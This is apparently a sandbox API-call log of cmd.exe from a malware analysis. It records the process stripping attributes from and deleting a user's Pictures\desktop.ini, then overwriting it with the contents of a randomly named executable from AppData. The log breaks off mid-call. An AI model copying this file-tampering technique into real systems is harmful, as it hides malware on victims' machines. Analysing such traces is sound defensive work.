lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.112] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.112] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.112] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.112] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.112] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.112] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.112] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.112] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.112] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0142.112] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.112] GetEnvironmentStringsW () returned 0x312568* [0142.112] FreeEnvironmentStringsW (penv=0x312568) returned 1 [0142.112] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.112] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.112] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.112] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.112] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0142.112] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0142.112] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.112] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.112] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.112] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.112] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f5b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.113] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f5b0, lpFilePart=0x20f5ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f5ac*="Desktop") returned 0x18 [0142.113] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.113] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f32c | out: lpFindFileData=0x20f32c) returned 0x310bf8 [0142.113] FindClose (in: hFindFile=0x310bf8 | out: hFindFile=0x310bf8) returned 1 [0142.113] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f32c | out: lpFindFileData=0x20f32c) returned 0x310bf8 [0142.113] FindClose (in: hFindFile=0x310bf8 | out: 
hFindFile=0x310bf8) returned 1 [0142.113] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f32c | out: lpFindFileData=0x20f32c) returned 0x310bf8 [0142.113] FindClose (in: hFindFile=0x310bf8 | out: hFindFile=0x310bf8) returned 1 [0142.113] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.113] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0142.113] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0142.114] GetEnvironmentStringsW () returned 0x310418* [0142.114] FreeEnvironmentStringsW (penv=0x310418) returned 1 [0142.114] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.114] GetConsoleOutputCP () returned 0x1b5 [0142.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.114] GetUserDefaultLCID () returned 0x409 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f6f0, cchData=128 | out: lpLCData="0") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f6f0, cchData=128 | out: lpLCData="0") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f6f0, cchData=128 | out: lpLCData="1") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0142.116] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.116] GetConsoleTitleW (in: lpConsoleTitle=0x300a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.117] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.117] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.117] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.117] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.118] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0142.118] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0142.118] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0142.118] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0142.118] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0142.118] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0142.118] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0142.120] _wcsicmp (_String1="del", _String2=")") returned 59 [0142.120] _wcsicmp (_String1="FOR", _String2="del") 
returned 2 [0142.120] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0142.120] _wcsicmp (_String1="IF", _String2="del") returned 5 [0142.120] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0142.120] _wcsicmp (_String1="REM", _String2="del") returned 14 [0142.120] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0142.122] _wcsicmp (_String1="type", _String2=")") returned 75 [0142.122] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0142.122] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0142.122] _wcsicmp (_String1="IF", _String2="type") returned -11 [0142.122] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0142.122] _wcsicmp (_String1="REM", _String2="type") returned -2 [0142.122] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0142.342] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0142.342] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0142.342] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0142.342] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0142.342] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0142.342] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0142.344] SetErrorMode (uMode=0x0) returned 0x0 [0142.344] SetErrorMode (uMode=0x1) returned 0x0 [0142.344] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x310420, lpFilePart=0x20eea4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20eea4*="Desktop") returned 0x18 [0142.344] SetErrorMode (uMode=0x0) returned 0x1 [0142.344] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.344] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0142.348] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.349] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0xffffffff [0142.666] GetLastError () returned 0x2 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0xffffffff [0142.666] GetLastError () returned 0x2 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0x3124e8 [0142.666] FindClose (in: hFindFile=0x3124e8 | out: hFindFile=0x3124e8) returned 1 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0xffffffff [0142.666] GetLastError () returned 0x2 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0x3124e8 [0142.667] FindClose (in: hFindFile=0x3124e8 | out: hFindFile=0x3124e8) returned 1 [0142.667] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0142.667] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0142.667] GetConsoleTitleW (in: lpConsoleTitle=0x20f118, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.667] InitializeProcThreadAttributeList (in: lpAttributeList=0x20efa0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f068 | out: lpAttributeList=0x20efa0, lpSize=0x20f068) returned 1 
[0142.667] UpdateProcThreadAttribute (in: lpAttributeList=0x20efa0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f060, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20efa0, lpPreviousValue=0x0) returned 1 [0142.667] GetStartupInfoW (in: lpStartupInfo=0x20ef5c | out: lpStartupInfo=0x20ef5c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0142.667] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0142.668] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20effc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f048 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessInformation=0x20f048*(hProcess=0x50, hThread=0x4c, dwProcessId=0x910, dwThreadId=0x8b4)) returned 1 [0142.671] CloseHandle (hObject=0x4c) returned 1 [0142.671] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0142.671] GetEnvironmentStringsW () returned 0x310838* [0142.671] FreeEnvironmentStringsW (penv=0x310838) returned 1 [0142.671] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0142.839] 
GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20ef3c | out: lpExitCode=0x20ef3c*=0x0) returned 1 [0142.839] CloseHandle (hObject=0x50) returned 1 [0142.839] _vsnwprintf (in: _Buffer=0x20f084, _BufferCount=0x13, _Format="%08X", _ArgList=0x20ef48 | out: _Buffer="00000000") returned 8 [0142.839] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0142.839] GetEnvironmentStringsW () returned 0x312558* [0142.840] FreeEnvironmentStringsW (penv=0x312558) returned 1 [0142.840] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0142.840] GetEnvironmentStringsW () returned 0x312558* [0142.840] FreeEnvironmentStringsW (penv=0x312558) returned 1 [0142.840] DeleteProcThreadAttributeList (in: lpAttributeList=0x20efa0 | out: lpAttributeList=0x20efa0) [0142.840] GetConsoleTitleW (in: lpConsoleTitle=0x20f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.840] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x20e398, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x20e39c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x20e398*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0142.841] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0142.841] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0142.841] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0142.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini")) returned 0x20 [0142.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x11 [0142.841] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0142.841] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 
[0142.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini")) returned 0x20 [0142.841] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3135e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3135e4) returned 0x312c78 [0142.842] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini")) returned 1 [0142.842] FindNextFileW (in: hFindFile=0x312c78, lpFindFileData=0x3135e4 | out: lpFindFileData=0x3135e4) returned 0 [0142.843] GetLastError () returned 0x12 [0142.843] FindClose (in: hFindFile=0x312c78 | out: hFindFile=0x312c78) returned 1 [0142.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.844] GetFileType (hFile=0x7) returned 0x2 [0142.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.844] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20f4bc | out: lpMode=0x20f4bc) returned 1 [0142.844] _dup (_FileHandle=1) returned 3 [0142.844] _close (_FileHandle=1) returned 0 [0142.845] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini", _String2="con") returned -53 [0142.845] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x20f48c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0142.845] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0142.845] GetConsoleTitleW (in: lpConsoleTitle=0x20f2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.845] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, 
lpFindFileData=0x20ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee20) returned 0x30e5e8 [0142.845] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0142.845] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0142.845] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0142.846] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x20dd2c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0142.846] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] GetFileType (hFile=0x58) returned 0x1 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x20dd84 | out: lpFileSizeHigh=0x20dd84*=0x0) returned 0x7d600 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.847] GetFileType (hFile=0x50) returned 0x1 [0142.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.847] GetFileType (hFile=0x50) returned 0x1 [0142.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.847] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.850] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType 
(hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.851] SetFilePointerEx (in: hFile=0x58, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.851] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, 